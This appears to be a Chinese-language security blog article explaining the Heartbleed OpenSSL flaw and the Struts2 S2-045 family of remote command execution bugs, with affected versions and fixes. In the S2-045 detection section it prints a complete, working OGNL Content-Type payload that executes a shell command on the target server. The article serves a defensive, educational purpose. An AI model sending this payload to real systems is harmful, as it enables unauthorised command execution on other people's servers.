当前位置：首页 > news >正文

深度剖析OpenSSL心脏滴血漏洞与Struts2远程命令执行漏洞

news 来源：原创 2025/6/10 13:18:32

深度剖析OpenSSL心脏滴血漏洞与Struts2远程命令执行漏洞

前言

在网络安全领域，漏洞的发现与修复是永恒的主题。本文将深入分析两个历史上影响深远的安全漏洞：OpenSSL心脏滴血漏洞和Struts2系列远程命令执行漏洞。这些漏洞不仅在当时造成了广泛影响，其背后的原理和防御思路至今仍具有重要的学习价值。

第一部分：OpenSSL心脏滴血漏洞(Heartbleed)

漏洞概述

心脏滴血漏洞(Heartbleed，CVE-2014-0160)是2014年4月7日曝光的OpenSSL重大安全漏洞，被评为互联网历史上最严重的安全漏洞之一。该漏洞允许攻击者从受影响的服务器内存中读取最多64KB的数据，可能导致敏感信息如私钥、用户凭证等泄露。

技术原理

OpenSSL是广泛使用的安全套接字层密码库，提供SSL/TLS协议实现。漏洞存在于OpenSSL的心跳扩展(Heartbeat Extension)实现中：

TLS心跳机制设计用于保持连接活跃，由请求包和响应包组成，正常情况下应包含相同的载荷(payload)
漏洞源于处理心跳请求时，OpenSSL从攻击者可控的包中读取载荷大小值，但未验证该值是否与实际数据长度匹配
攻击者可构造恶意心跳请求，声明较大的载荷长度而实际发送较短数据，导致越界读取服务器内存内容

# 简化的漏洞原理示意代码
def process_heartbeat(request):payload_length = request.read_payload_length()  # 从攻击者控制的包中读取payload = request.read_payload()               # 实际数据可能比声明的长度短# 未验证payload_length与实际数据长度的匹配response = create_heartbeat_response(payload, payload_length)return response  # 可能包含内存中的敏感数据

影响范围

受影响版本：

OpenSSL 1.0.1系列（1.0.1a至1.0.1f）
OpenSSL 1.0.2-beta和1.0.2-beta1

不受影响版本：

OpenSSL 1.0.1g及更高版本
OpenSSL 1.0.2-beta2及更高版本
OpenSSL 1.0.0系列
OpenSSL 0.9.8系列

漏洞验证方法

验证漏洞存在的基本流程：

建立socket连接目标服务器
发送TLS/SSL Client Hello请求
发送特制的畸形heartbleed请求包
检查服务器响应是否包含异常数据（Encrypted Heartbeats Message）

开源验证工具参考：

heartbleed-masstest

修复方案

官方解决方案：

立即升级到OpenSSL 1.0.1g或更高版本
对于OpenSSL 1.0.2系列，升级到1.0.2-beta2或更高版本

临时缓解措施（如无法立即升级）：

使用-DOPENSSL_NO_HEARTBEATS选项重新编译OpenSSL，禁用心跳扩展
主流Linux发行版提供的安全补丁

漏洞影响与启示

心脏滴血漏洞影响了全球约17%的HTTPS服务器，包括许多知名网站和服务。它给我们的启示包括：

即使是广泛使用的加密库也可能存在严重缺陷
开源软件的审计和维护至关重要
安全响应机制和快速更新能力是系统安全的关键

第二部分：Struts2远程命令执行漏洞

漏洞家族概述

Apache Struts2是一个流行的MVC框架，历史上多次出现远程命令执行漏洞，形成"S2"系列漏洞：

S2-045：通过恶意Content-Type头执行OGNL表达式
S2-046：S2-045的绕过方式（通过Content-Disposition或超大Content-Length）
S2-048：Struts1插件中的OGNL注入
S2-052：REST插件XStream反序列化漏洞
S2-053：Freemarker标签不当编码导致RCE
S2-054：过时JSON-lib库导致的DoS
S2-055：Jackson JSON库反序列化漏洞

S2-045漏洞深度分析

漏洞原理

S2-045是Struts2框架中最著名的漏洞之一，CVSS评分高达10.0。漏洞源于：

Struts2使用Jakarta Multipart parser插件处理文件上传
当Content-Type格式不被识别时，错误处理过程中会评估用户输入的OGNL表达式
攻击者可通过构造恶意的Content-Type头注入OGNL代码，导致远程命令执行

// 简化的漏洞触发流程
public class JakartaMultiPartRequest extends MultiPartRequest {public void parse(HttpServletRequest request, String saveDir) {String contentType = request.getContentType(); // 攻击者可控// ...try {processUpload(request, saveDir);} catch (InvalidContentTypeException e) {buildErrorMessage(e, request); // 错误处理中评估OGNL}}
}

影响版本

Struts 2.3.5 - Struts 2.3.31
Struts 2.5 - Struts 2.5.10

检测方法

POC验证：发送特制请求测试漏洞存在

POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

版本检查：确认使用的Struts2版本是否在受影响范围内
漏洞扫描工具：使用专业工具如Nessus、OpenVAS等进行检测
在线检测平台：部分安全公司提供的在线检测服务

修复方案

官方解决方案：

升级到安全版本：
- Struts 2.3.32：下载链接
- Struts 2.5.10.1：下载链接

临时缓解措施：

修改Struts配置：

<struts><constant name="struts.custom.i18n.resources" value="global"/>
</struts>

并创建WEB-INF/classes/global.properties文件：

struts.messages.upload.error.InvalidContentTypeException=1

配置Content-Type过滤器：

<filter><filter-name>contentTypeFilter</filter-name><filter-class>com.example.ContentTypeFilter</filter-class>
</filter>
<filter-mapping><filter-name>contentTypeFilter</filter-name><url-pattern>/*</url-pattern>
</filter-mapping>